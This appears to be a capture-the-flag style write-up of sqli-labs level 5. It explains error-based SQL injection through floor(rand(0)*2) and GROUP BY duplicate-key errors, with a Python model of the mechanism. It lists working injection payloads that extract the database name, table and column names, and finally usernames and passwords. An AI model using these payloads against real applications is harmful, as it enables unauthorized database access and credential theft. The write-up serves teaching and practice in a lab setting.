Lab environment: sqllabs, level 5
The reason floor() error-based injection works is that when GROUP BY inserts data into its temporary table, rand() is evaluated more than once, so a duplicate primary key occurs on insertion into the temporary table and an error is raised; and because the SQL statement or function inside concat() has already been executed before the error is raised, the statement errors out and the primary key reported in the error is the result of executing that SQL statement or function.
There is also one most important property: when GROUP BY is used together with rand(), if the temporary table does not yet contain the key, rand() is computed once more before the insert (that is, twice; some blogs write "multiple times", and exactly how many that is remains unknown, but reading it as twice makes all of the experiments below consistent). It is this property that causes the duplicate primary key and the error.
The passage above is quoted from the author 酒仙橋六號部隊:
Do you really understand floor() error-based injection? - SecPulse.COM | 安全脈搏
It is worth reading; the explanation of the principle there is very detailed.
Below is the lab process.
id=-1' union select count(*),1,concat('~',(select database()),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
-1' union select count(*),1,concat('~',(select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
-1' union select count(*),1,concat('~',(select concat(table_name) from information_schema.tables where table_schema=database()limit 3,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
-1' union select count(*),1,concat('~',(select concat(column_name) from information_schema.columns where table_name='users'limit 1,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+
?id=-1'union select count(*),1, concat('~',(select concat(column_name) from information_schema.columns where table_name='users' limit 2,1),'~',floor(rand()*2)) as x from information_schema.tables group by x--+
-1'union select count(*),1, concat('~',(select concat(password,username) from users limit 7,1),'~',floor(rand()*2)) as x from information_schema.tables group by x--+
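To make the quoted mechanism concrete, here is an added Python model (not part of the original post or of the quoted article) of how GROUP BY fills its temporary table: the key expression is evaluated once to probe the table and, if the key is absent, evaluated again to build the inserted row. It reproduces MySQL's RAND(seed) arithmetic (my_rnd with modulus 0x3FFFFFFF) so that floor(rand(0)*2) yields the deterministic 0,1,1,0,1,1,... sequence; the database name and row counts used are constructed sample values, and the function names are my own.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()

def mysql_rand(seed):
    """Generator reproducing MySQL RAND(seed): my_rnd_init() then my_rnd()."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE

def floor_rand_sequence(seed, n):
    """First n values of floor(rand(seed)*2); for seed 0: 0,1,1,0,1,1,0,..."""
    gen = mysql_rand(seed)
    return [math.floor(next(gen) * 2) for _ in range(n)]

class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 'Duplicate entry ... for key group_key'."""

def simulate_group_by(leaked_value, n_rows, seed=0):
    """Model (not MySQL source) of GROUP BY x filling its temporary table.
    Per source row: evaluate the key once to probe the table; if present,
    bump the counter; if absent, evaluate it AGAIN (the second rand() call
    described above) to build the row, and fail if that value now collides.
    The error text carries the key, i.e. the concat() result with the value."""
    gen = mysql_rand(seed)
    key = lambda: f"~{leaked_value}~{math.floor(next(gen) * 2)}"
    table = {}
    for _ in range(n_rows):
        probe = key()
        if probe in table:
            table[probe] += 1
            continue
        insert = key()
        if insert in table:
            raise DuplicateEntry(f"Duplicate entry '{insert}' for key 'group_key'")
        table[insert] = 1
    return table

def error_message(leaked_value, n_rows):
    """Error text the query would surface, or None if it completes cleanly."""
    try:
        simulate_group_by(leaked_value, n_rows)
        return None
    except DuplicateEntry as e:
        return str(e)
```

With two source rows the query completes without error; from three rows on, the third row probes key 0, misses, re-evaluates to key 1 and collides, which is why the payloads above need a table such as information_schema.tables with at least three rows. The error only leaks anything because the application echoes raw database errors; suppressing them (and using parameterized queries) removes the channel.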